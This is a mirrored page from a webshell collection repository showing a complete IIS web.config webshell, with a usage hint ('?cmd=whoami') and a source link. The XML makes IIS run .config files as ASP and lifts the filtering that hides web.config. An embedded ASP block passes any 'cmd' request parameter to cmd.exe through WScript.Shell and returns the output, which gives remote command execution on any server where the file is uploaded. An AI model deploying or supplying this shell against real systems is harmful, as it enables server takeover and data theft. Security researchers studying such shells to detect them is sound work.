mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
77618164ad
use: /web.config?cmd=whoami from: https://sethjackson.github.io/2018/10/27/rce-through-web-config-upload/
32 lines
1,003 B
XML
32 lines
1,003 B
XML
<?xml version="1.0" encoding="UTF-8"?>
|
|
<configuration>
|
|
<system.webServer>
|
|
<handlers accessPolicy="Read, Script, Write">
|
|
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
|
</handlers>
|
|
<security>
|
|
<requestFiltering>
|
|
<fileExtensions>
|
|
<remove fileExtension=".config" />
|
|
</fileExtensions>
|
|
<hiddenSegments>
|
|
<remove segment="web.config" />
|
|
</hiddenSegments>
|
|
</requestFiltering>
|
|
</security>
|
|
</system.webServer>
|
|
</configuration>
|
|
<!--
|
|
<%
|
|
Response.Write("-"&"->")
|
|
|
|
Function GetCommandOutput(command)
|
|
Set shell = CreateObject("WScript.Shell")
|
|
Set exec = shell.Exec(command)
|
|
GetCommandOutput = exec.StdOut.ReadAll
|
|
End Function
|
|
|
|
Response.Write(GetCommandOutput("cmd /c " + Request("cmd")))
|
|
Response.Write("<!-"&"-")
|
|
%>
|
|
-->
|